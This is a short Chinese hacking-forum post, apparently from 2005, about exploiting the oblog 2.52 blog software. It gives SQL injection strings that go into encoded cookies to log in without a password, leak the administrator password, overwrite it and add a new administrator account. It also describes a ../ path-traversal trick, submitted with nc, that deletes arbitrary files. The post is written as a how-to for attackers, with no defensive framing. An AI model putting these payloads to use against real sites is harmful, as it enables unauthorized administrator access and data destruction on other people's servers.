作者:9xiao
今天看了黑x上的一篇文章,顺便就做了个动画
由于oblog2.52中的inc/function.asp文件中的checkuserlogined()函数对password没有过滤就放到了sql语句执行导致了sql注入,最明显的是a’ or ’a’=’a漏洞,在function.asp还有两个函数codeCookie()是加密用户名和密码的,decodeCookie()是解密,如果是mssql,可以导致后台更改管理员密码和添加管理员等等。
0dca22a731e30058’ and 1<(select userpassword from [user] where userid=1)--暴管理员密码
0dca22a731e30058’ update [user] set userpassword=’0dca22a731e30058’ where username=’admin’ 修改管理员密码
0dca22a731e30058’ inset into admin(username,password) values(’9xiao’,’0dca22a731e30058’)-- 加管理员,上面三个语句需要运行codecookie加密后在ieview修改cookies
好久没有做动画嘿嘿,今天有些时间做个最新的oblog2.52的cookies欺骗,把a’ or ’a’=’a加密,在password中修改,嘿嘿进前台了,这个版本还有一个删除任意文件的漏洞,动画在网上已经出了,偶简单说下,抓包,在文件名那地方利用../来指定你要删除的文件比如../index.asp修改好后用nc提交就可以了,本来演示提权的没有找到mssql版的,就算了。
记得来火狐做客啊,2005年8.27号的火狐主办河南省首届网络攻防大赛开始了,欢迎来报名。呵呵·! |
安全中国首页 > 文章中心 > Oblog文章